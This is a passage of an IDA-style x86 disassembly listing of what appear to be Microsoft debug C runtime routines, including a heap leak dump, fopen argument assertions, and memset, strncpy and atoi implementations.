cmp eax, 1
jnz short loc_41DE3F
int 3 ; Trap to Debugger
loc_41DE3F: ; CODE XREF: sub_41DC10+22C�j
xor edx, edx
test edx, edx
jnz short loc_41DE16
mov eax, [ebp+var_1C]
push eax
call sub_41DF10
add esp, 4
jmp short loc_41DEAE
; ---------------------------------------------------------------------------
loc_41DE53: ; CODE XREF: sub_41DC10+204�j
mov ecx, [ebp+var_1C]
mov edx, [ecx+14h]
and edx, 0FFFFh
cmp edx, 2
jnz short loc_41DEAE
loc_41DE64: ; CODE XREF: sub_41DC10+290�j
mov eax, [ebp+var_1C]
mov ecx, [eax+10h]
push ecx
mov edx, [ebp+var_1C]
mov eax, [edx+14h]
sar eax, 10h
and eax, 0FFFFh
push eax
mov ecx, [ebp+var_1C]
add ecx, 20h
push ecx
push offset aCrtBlockAt0x08 ; "crt block at 0x%08X, subtype %x, %u byt"...
push 0
push 0
push 0
push 0
call sub_422610
add esp, 20h
cmp eax, 1
jnz short loc_41DE9C
int 3 ; Trap to Debugger
loc_41DE9C: ; CODE XREF: sub_41DC10+289�j
xor edx, edx
test edx, edx
jnz short loc_41DE64
mov eax, [ebp+var_1C]
push eax
call sub_41DF10
add esp, 4
loc_41DEAE: ; CODE XREF: sub_41DC10:loc_41DCE5�j
; sub_41DC10:loc_41DE08�j ...
jmp loc_41DC89
; ---------------------------------------------------------------------------
loc_41DEB3: ; CODE XREF: sub_41DC10+85�j
; sub_41DC10+91�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_41DEC1
jmp short loc_41DECC
sub_41DC10 endp
; =============== S U B R O U T I N E =======================================
sub_41DEC1 proc near ; CODE XREF: sub_41DC10+2AA�p
; DATA XREF: _1:0043CC58�o
push 9
call sub_423320
add esp, 4
retn
sub_41DEC1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41DC10
loc_41DECC: ; CODE XREF: sub_41DC10+2AF�j
; sub_41DC10+2E0�j
push offset aObjectDumpComp ; "Object dump complete.\n"
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41DEEC
int 3 ; Trap to Debugger
loc_41DEEC: ; CODE XREF: sub_41DC10+2D9�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41DECC
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41DC10
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DF10 proc near ; CODE XREF: sub_41DC10+1F0�p
; sub_41DC10+239�p ...
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_34 = byte ptr -34h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov [ebp+var_4C], 0
jmp short loc_41DF2B
; ---------------------------------------------------------------------------
loc_41DF22: ; CODE XREF: sub_41DF10+D7�j
mov eax, [ebp+var_4C]
add eax, 1
mov [ebp+var_4C], eax
loc_41DF2B: ; CODE XREF: sub_41DF10+10�j
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+10h], 10h
jge short loc_41DF3F
mov edx, [ebp+arg_0]
mov eax, [edx+10h]
mov [ebp+var_54], eax
jmp short loc_41DF46
; ---------------------------------------------------------------------------
loc_41DF3F: ; CODE XREF: sub_41DF10+22�j
mov [ebp+var_54], 10h
loc_41DF46: ; CODE XREF: sub_41DF10+2D�j
mov ecx, [ebp+var_4C]
cmp ecx, [ebp+var_54]
jge loc_41DFEC
mov edx, [ebp+arg_0]
add edx, [ebp+var_4C]
mov al, [edx+20h]
mov byte ptr [ebp+var_50], al
cmp ds:dword_453DF0, 1
jle short loc_41DF83
push 157h
mov ecx, [ebp+var_50]
and ecx, 0FFh
push ecx
call sub_427040
add esp, 8
mov [ebp+var_58], eax
jmp short loc_41DFA0
; ---------------------------------------------------------------------------
loc_41DF83: ; CODE XREF: sub_41DF10+55�j
mov edx, [ebp+var_50]
and edx, 0FFh
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 157h
mov [ebp+var_58], ecx
loc_41DFA0: ; CODE XREF: sub_41DF10+71�j
cmp [ebp+var_58], 0
jz short loc_41DFB4
mov edx, [ebp+var_50]
and edx, 0FFh
mov [ebp+var_5C], edx
jmp short loc_41DFBB
; ---------------------------------------------------------------------------
loc_41DFB4: ; CODE XREF: sub_41DF10+94�j
mov [ebp+var_5C], 20h
loc_41DFBB: ; CODE XREF: sub_41DF10+A2�j
mov eax, [ebp+var_4C]
mov cl, byte ptr [ebp+var_5C]
mov [ebp+eax+var_48], cl
mov edx, [ebp+var_50]
and edx, 0FFh
push edx
push offset a_2x ; "%.2X "
mov eax, [ebp+var_4C]
imul eax, 3
lea ecx, [ebp+eax+var_34]
push ecx
call sub_41EA60
add esp, 0Ch
jmp loc_41DF22
; ---------------------------------------------------------------------------
loc_41DFEC: ; CODE XREF: sub_41DF10+3C�j
mov edx, [ebp+var_4C]
mov [ebp+edx+var_48], 0
loc_41DFF4: ; CODE XREF: sub_41DF10+10B�j
lea eax, [ebp+var_34]
push eax
lea ecx, [ebp+var_48]
push ecx
push offset aDataSS ; " Data: <%s> %s\n"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 1Ch
cmp eax, 1
jnz short loc_41E017
int 3 ; Trap to Debugger
loc_41E017: ; CODE XREF: sub_41DF10+104�j
xor edx, edx
test edx, edx
jnz short loc_41DFF4
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41DF10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E030 proc near ; CODE XREF: sub_41E920+B9�p
var_34 = byte ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
lea eax, [ebp+var_34]
push eax
call sub_41D930
add esp, 4
cmp [ebp+var_20], 0
jnz short loc_41E064
cmp [ebp+var_2C], 0
jnz short loc_41E064
mov ecx, ds:dword_4517E0
and ecx, 10h
test ecx, ecx
jz short loc_41E09B
cmp [ebp+var_28], 0
jz short loc_41E09B
loc_41E064: ; CODE XREF: sub_41E030+19�j
; sub_41E030+1F�j ...
push offset aDetectedMemory ; "Detected memory leaks!\n"
push offset aS_19 ; "%s"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41E084
int 3 ; Trap to Debugger
loc_41E084: ; CODE XREF: sub_41E030+51�j
xor edx, edx
test edx, edx
jnz short loc_41E064
push 0
call sub_41DC10
add esp, 4
mov eax, 1
jmp short loc_41E09D
; ---------------------------------------------------------------------------
loc_41E09B: ; CODE XREF: sub_41E030+2C�j
; sub_41E030+32�j
xor eax, eax
loc_41E09D: ; CODE XREF: sub_41E030+69�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41E030 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
cmp dword ptr [ebp+8], 0
jnz short loc_41E0C2
jmp loc_41E16E
; ---------------------------------------------------------------------------
loc_41E0C2: ; CODE XREF: _0:0041E0BB�j
mov dword ptr [ebp-4], 0
jmp short loc_41E0D4
; ---------------------------------------------------------------------------
loc_41E0CB: ; CODE XREF: _0:0041E11C�j
mov eax, [ebp-4]
add eax, 1
mov [ebp-4], eax
loc_41E0D4: ; CODE XREF: _0:0041E0C9�j
cmp dword ptr [ebp-4], 5
jge short loc_41E11E
loc_41E0DA: ; CODE XREF: _0:0041E11A�j
mov ecx, [ebp-4]
mov edx, ds:off_4517F0[ecx*4]
push edx
mov eax, [ebp-4]
mov ecx, [ebp+8]
mov edx, [ecx+eax*4+4]
push edx
mov eax, [ebp-4]
mov ecx, [ebp+8]
mov edx, [ecx+eax*4+18h]
push edx
push offset aLdBytesInLdHsB ; "%ld bytes in %ld %hs Blocks.\n"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 20h
cmp eax, 1
jnz short loc_41E116
int 3 ; Trap to Debugger
loc_41E116: ; CODE XREF: _0:0041E113�j
xor eax, eax
test eax, eax
jnz short loc_41E0DA
jmp short loc_41E0CB
; ---------------------------------------------------------------------------
loc_41E11E: ; CODE XREF: _0:0041E0D8�j _0:0041E144�j
mov ecx, [ebp+8]
mov edx, [ecx+2Ch]
push edx
push offset aLargestNumberU ; "Largest number used: %ld bytes.\n"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41E140
int 3 ; Trap to Debugger
loc_41E140: ; CODE XREF: _0:0041E13D�j
xor eax, eax
test eax, eax
jnz short loc_41E11E
loc_41E146: ; CODE XREF: _0:0041E16C�j
mov ecx, [ebp+8]
mov edx, [ecx+30h]
push edx
push offset aTotalAllocatio ; "Total allocations: %ld bytes.\n"
push 0
push 0
push 0
push 0
call sub_422610
add esp, 18h
cmp eax, 1
jnz short loc_41E168
int 3 ; Trap to Debugger
loc_41E168: ; CODE XREF: _0:0041E165�j
xor eax, eax
test eax, eax
jnz short loc_41E146
loc_41E16E: ; CODE XREF: _0:0041E0BD�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E180 proc near ; CODE XREF: sub_4010AA+43�p
; sub_40F986+4E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_C]
push eax
call sub_422420
add esp, 4
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41E1C0
add esp, 10h
mov [ebp+var_4], eax
mov edx, [ebp+arg_C]
push edx
call sub_422490
add esp, 4
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41E180 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E1C0 proc near ; CODE XREF: sub_41E180+20�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_4]
imul ecx, [ebp+arg_8]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
mov [ebp+var_C], edx
cmp [ebp+var_C], 0
jnz short loc_41E1E9
xor eax, eax
jmp loc_41E38B
; ---------------------------------------------------------------------------
loc_41E1E9: ; CODE XREF: sub_41E1C0+20�j
mov eax, [ebp+arg_C]
mov ecx, [eax+0Ch]
and ecx, 10Ch
test ecx, ecx
jz short loc_41E204
mov edx, [ebp+arg_C]
mov eax, [edx+18h]
mov [ebp+var_1C], eax
jmp short loc_41E20B
; ---------------------------------------------------------------------------
loc_41E204: ; CODE XREF: sub_41E1C0+37�j
mov [ebp+var_1C], 1000h
loc_41E20B: ; CODE XREF: sub_41E1C0+42�j
; sub_41E1C0:loc_41E383�j
cmp [ebp+var_C], 0
jz loc_41E388
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
and edx, 10Ch
test edx, edx
jz short loc_41E299
mov eax, [ebp+arg_C]
cmp dword ptr [eax+4], 0
jz short loc_41E299
mov ecx, [ebp+arg_C]
mov edx, [ebp+var_C]
cmp edx, [ecx+4]
jnb short loc_41E241
mov eax, [ebp+var_C]
mov [ebp+var_20], eax
jmp short loc_41E24A
; ---------------------------------------------------------------------------
loc_41E241: ; CODE XREF: sub_41E1C0+77�j
mov ecx, [ebp+arg_C]
mov edx, [ecx+4]
mov [ebp+var_20], edx
loc_41E24A: ; CODE XREF: sub_41E1C0+7F�j
mov eax, [ebp+var_20]
mov [ebp+var_18], eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+arg_C]
mov eax, [edx]
push eax
mov ecx, [ebp+var_8]
push ecx
call sub_41FBF0
add esp, 0Ch
mov edx, [ebp+var_C]
sub edx, [ebp+var_18]
mov [ebp+var_C], edx
mov eax, [ebp+arg_C]
mov ecx, [eax+4]
sub ecx, [ebp+var_18]
mov edx, [ebp+arg_C]
mov [edx+4], ecx
mov eax, [ebp+arg_C]
mov ecx, [eax]
add ecx, [ebp+var_18]
mov edx, [ebp+arg_C]
mov [edx], ecx
mov eax, [ebp+var_8]
add eax, [ebp+var_18]
mov [ebp+var_8], eax
jmp loc_41E383
; ---------------------------------------------------------------------------
loc_41E299: ; CODE XREF: sub_41E1C0+63�j
; sub_41E1C0+6C�j
mov ecx, [ebp+var_C]
cmp ecx, [ebp+var_1C]
jb loc_41E33E
cmp [ebp+var_1C], 0
jz short loc_41E2BD
mov eax, [ebp+var_C]
xor edx, edx
div [ebp+var_1C]
mov eax, [ebp+var_C]
sub eax, edx
mov [ebp+var_24], eax
jmp short loc_41E2C3
; ---------------------------------------------------------------------------
loc_41E2BD: ; CODE XREF: sub_41E1C0+E9�j
mov ecx, [ebp+var_C]
mov [ebp+var_24], ecx
loc_41E2C3: ; CODE XREF: sub_41E1C0+FB�j
mov edx, [ebp+var_24]
mov [ebp+var_18], edx
mov eax, [ebp+var_18]
push eax
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_C]
mov eax, [edx+10h]
push eax
call sub_4272F0
add esp, 0Ch
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_41E308
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
or edx, 10h
mov eax, [ebp+arg_C]
mov [eax+0Ch], edx
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp loc_41E38B
; ---------------------------------------------------------------------------
loc_41E308: ; CODE XREF: sub_41E1C0+127�j
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_41E32A
mov ecx, [ebp+arg_C]
mov edx, [ecx+0Ch]
or edx, 20h
mov eax, [ebp+arg_C]
mov [eax+0Ch], edx
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp short loc_41E38B
; ---------------------------------------------------------------------------
loc_41E32A: ; CODE XREF: sub_41E1C0+14C�j
mov ecx, [ebp+var_C]
sub ecx, [ebp+var_14]
mov [ebp+var_C], ecx
mov edx, [ebp+var_8]
add edx, [ebp+var_14]
mov [ebp+var_8], edx
jmp short loc_41E383
; ---------------------------------------------------------------------------
loc_41E33E: ; CODE XREF: sub_41E1C0+DF�j
mov eax, [ebp+arg_C]
push eax
call sub_427100
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_41E360
mov eax, [ebp+var_10]
sub eax, [ebp+var_C]
xor edx, edx
div [ebp+arg_4]
jmp short loc_41E38B
; ---------------------------------------------------------------------------
loc_41E360: ; CODE XREF: sub_41E1C0+191�j
mov ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_4]
mov [ecx], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_C]
sub ecx, 1
mov [ebp+var_C], ecx
mov edx, [ebp+arg_C]
mov eax, [edx+18h]
mov [ebp+var_1C], eax
loc_41E383: ; CODE XREF: sub_41E1C0+D4�j
; sub_41E1C0+17C�j
jmp loc_41E20B
; ---------------------------------------------------------------------------
loc_41E388: ; CODE XREF: sub_41E1C0+4F�j
mov eax, [ebp+arg_8]
loc_41E38B: ; CODE XREF: sub_41E1C0+24�j
; sub_41E1C0+143�j ...
mov esp, ebp
pop ebp
retn
sub_41E1C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E390 proc near ; CODE XREF: sub_41E490+D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
loc_41E399: ; CODE XREF: sub_41E390+31�j
cmp [ebp+arg_0], 0
jnz short loc_41E3BD
push offset aFileNull ; "file != NULL"
push 0
push 35h
push offset aFopen_c ; "fopen.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41E3BD
int 3 ; Trap to Debugger
loc_41E3BD: ; CODE XREF: sub_41E390+D�j
; sub_41E390+2A�j
xor eax, eax
test eax, eax
jnz short loc_41E399
loc_41E3C3: ; CODE XREF: sub_41E390+5F�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_41E3EB
push offset aFile_t0 ; "*file != _T('\\0')"
push 0
push 36h
push offset aFopen_c ; "fopen.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41E3EB
int 3 ; Trap to Debugger
loc_41E3EB: ; CODE XREF: sub_41E390+3B�j
; sub_41E390+58�j
xor eax, eax
test eax, eax
jnz short loc_41E3C3
loc_41E3F1: ; CODE XREF: sub_41E390+89�j
cmp [ebp+arg_4], 0
jnz short loc_41E415
push offset aModeNull ; "mode != NULL"
push 0
push 37h
push offset aFopen_c ; "fopen.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41E415
int 3 ; Trap to Debugger
loc_41E415: ; CODE XREF: sub_41E390+65�j
; sub_41E390+82�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41E3F1
loc_41E41B: ; CODE XREF: sub_41E390+B7�j
mov edx, [ebp+arg_4]
movsx eax, byte ptr [edx]
test eax, eax
jnz short loc_41E443
push offset aMode_t0 ; "*mode != _T('\\0')"
push 0
push 38h
push offset aFopen_c ; "fopen.c"
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41E443
int 3 ; Trap to Debugger
loc_41E443: ; CODE XREF: sub_41E390+93�j
; sub_41E390+B0�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41E41B
call sub_427B60
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41E45B
xor eax, eax
jmp short loc_41E485
; ---------------------------------------------------------------------------
loc_41E45B: ; CODE XREF: sub_41E390+C5�j
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_4277D0
add esp, 10h
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
push eax
call sub_422490
add esp, 4
mov eax, [ebp+var_8]
loc_41E485: ; CODE XREF: sub_41E390+C9�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41E390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E490 proc near ; CODE XREF: sub_4010AA+18�p
; sub_401C87+596B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 40h
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_41E390
add esp, 0Ch
pop ebp
retn
sub_41E490 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41E4B0 proc near ; CODE XREF: _0:00401207�p _0:00401215�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_41E503
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_41E4F7
neg ecx
and ecx, 3
jz short loc_41E4D9
sub edx, ecx
loc_41E4D3: ; CODE XREF: sub_41E4B0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_41E4D3
loc_41E4D9: ; CODE XREF: sub_41E4B0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_41E4F7
rep stosd
test edx, edx
jz short loc_41E4FD
loc_41E4F7: ; CODE XREF: sub_41E4B0+18�j
; sub_41E4B0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_41E4F7
loc_41E4FD: ; CODE XREF: sub_41E4B0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41E503: ; CODE XREF: sub_41E4B0+A�j
mov eax, [esp+arg_0]
retn
sub_41E4B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41E510 proc near ; CODE XREF: sub_401404+48A�p
; sub_401404+4A6�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_41E593
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_41E534
shr ecx, 2
jnz short loc_41E5A1
jmp short loc_41E555
; ---------------------------------------------------------------------------
loc_41E534: ; CODE XREF: sub_41E510+1B�j
; sub_41E510+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_41E562
test al, al
jz short loc_41E56A
test esi, 3
jnz short loc_41E534
mov ebx, ecx
shr ecx, 2
jnz short loc_41E5A1
loc_41E550: ; CODE XREF: sub_41E510+8F�j
and ebx, 3
jz short loc_41E562
loc_41E555: ; CODE XREF: sub_41E510+22�j
; sub_41E510+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_41E58E
dec ebx
jnz short loc_41E555
loc_41E562: ; CODE XREF: sub_41E510+2B�j
; sub_41E510+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41E56A: ; CODE XREF: sub_41E510+2F�j
test edi, 3
jz short loc_41E584
loc_41E572: ; CODE XREF: sub_41E510+72�j
mov [edi], al
inc edi
dec ecx
jz loc_41E606
test edi, 3
jnz short loc_41E572
loc_41E584: ; CODE XREF: sub_41E510+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_41E5F7
loc_41E58B: ; CODE XREF: sub_41E510+7F�j
; sub_41E510+F4�j
mov [edi], al
inc edi
loc_41E58E: ; CODE XREF: sub_41E510+4D�j
dec ebx
jnz short loc_41E58B
pop ebx
pop esi
loc_41E593: ; CODE XREF: sub_41E510+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41E599: ; CODE XREF: sub_41E510+A9�j
; sub_41E510+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_41E550
loc_41E5A1: ; CODE XREF: sub_41E510+20�j
; sub_41E510+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_41E599
test dl, dl
jz short loc_41E5EB
test dh, dh
jz short loc_41E5E1
test edx, 0FF0000h
jz short loc_41E5D7
test edx, 0FF000000h
jnz short loc_41E599
mov [edi], edx
jmp short loc_41E5EF
; ---------------------------------------------------------------------------
loc_41E5D7: ; CODE XREF: sub_41E510+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_41E5EF
; ---------------------------------------------------------------------------
loc_41E5E1: ; CODE XREF: sub_41E510+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_41E5EF
; ---------------------------------------------------------------------------
loc_41E5EB: ; CODE XREF: sub_41E510+AD�j
xor edx, edx
mov [edi], edx
loc_41E5EF: ; CODE XREF: sub_41E510+C5�j
; sub_41E510+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_41E601
loc_41E5F7: ; CODE XREF: sub_41E510+79�j
xor eax, eax
loc_41E5F9: ; CODE XREF: sub_41E510+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_41E5F9
loc_41E601: ; CODE XREF: sub_41E510+E5�j
and ebx, 3
jnz short loc_41E58B
loc_41E606: ; CODE XREF: sub_41E510+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_41E510 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E610 proc near ; CODE XREF: sub_41E710+7�p
; sub_433090+271�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
loc_41E616: ; CODE XREF: sub_41E610+4E�j
cmp ds:dword_453DF0, 1
jle short loc_41E636
push 8
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
push ecx
call sub_427040
add esp, 8
mov [ebp+var_10], eax
jmp short loc_41E64F
; ---------------------------------------------------------------------------
loc_41E636: ; CODE XREF: sub_41E610+D�j
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8
mov [ebp+var_10], edx
loc_41E64F: ; CODE XREF: sub_41E610+24�j
cmp [ebp+var_10], 0
jz short loc_41E660
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
jmp short loc_41E616
; ---------------------------------------------------------------------------
loc_41E660: ; CODE XREF: sub_41E610+43�j
mov ecx, [ebp+arg_0]
xor edx, edx
mov dl, [ecx]
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+var_4]
mov [ebp+var_C], ecx
cmp [ebp+var_4], 2Dh
jz short loc_41E685
cmp [ebp+var_4], 2Bh
jnz short loc_41E698
loc_41E685: ; CODE XREF: sub_41E610+6D�j
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
loc_41E698: ; CODE XREF: sub_41E610+73�j
mov [ebp+var_8], 0
loc_41E69F: ; CODE XREF: sub_41E610+E9�j
cmp ds:dword_453DF0, 1
jle short loc_41E6BB
push 4
mov edx, [ebp+var_4]
push edx
call sub_427040
add esp, 8
mov [ebp+var_14], eax
jmp short loc_41E6D0
; ---------------------------------------------------------------------------
loc_41E6BB: ; CODE XREF: sub_41E610+96�j
mov eax, [ebp+var_4]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_14], edx
loc_41E6D0: ; CODE XREF: sub_41E610+A9�j
cmp [ebp+var_14], 0
jz short loc_41E6FB
mov eax, [ebp+var_8]
imul eax, 0Ah
mov ecx, [ebp+var_4]
lea edx, [eax+ecx-30h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
jmp short loc_41E69F
; ---------------------------------------------------------------------------
loc_41E6FB: ; CODE XREF: sub_41E610+C4�j
cmp [ebp+var_C], 2Dh
jnz short loc_41E708
mov eax, [ebp+var_8]
neg eax
jmp short loc_41E70B
; ---------------------------------------------------------------------------
loc_41E708: ; CODE XREF: sub_41E610+EF�j
mov eax, [ebp+var_8]
loc_41E70B: ; CODE XREF: sub_41E610+F6�j
mov esp, ebp
pop ebp
retn
sub_41E610 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E710 proc near ; CODE XREF: sub_401404+2F4�p
; sub_401C87+700�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push eax
call sub_41E610
add esp, 4
pop ebp
retn
sub_41E710 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 18h
push esi
loc_41E737: ; CODE XREF: _0:0041E77F�j
cmp ds:dword_453DF0, 1
jle short loc_41E757
push 8
mov eax, [ebp+8]
xor ecx, ecx
mov cl, [eax]
push ecx
call sub_427040
add esp, 8
mov [ebp-14h], eax
jmp short loc_41E770
; ---------------------------------------------------------------------------
loc_41E757: ; CODE XREF: _0:0041E73E�j
mov edx, [ebp+8]
xor eax, eax
mov al, [edx]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8
mov [ebp-14h], edx
loc_41E770: ; CODE XREF: _0:0041E755�j
cmp dword ptr [ebp-14h], 0
jz short loc_41E781
mov eax, [ebp+8]
add eax, 1
mov [ebp+8], eax
jmp short loc_41E737
; ---------------------------------------------------------------------------
loc_41E781: ; CODE XREF: _0:0041E774�j
mov ecx, [ebp+8]
xor edx, edx
mov dl, [ecx]
mov [ebp-4], edx
mov eax, [ebp+8]
add eax, 1
mov [ebp+8], eax
mov ecx, [ebp-4]
mov [ebp-10h], ecx
cmp dword ptr [ebp-4], 2Dh
jz short loc_41E7A6
cmp dword ptr [ebp-4], 2Bh
jnz short loc_41E7B9
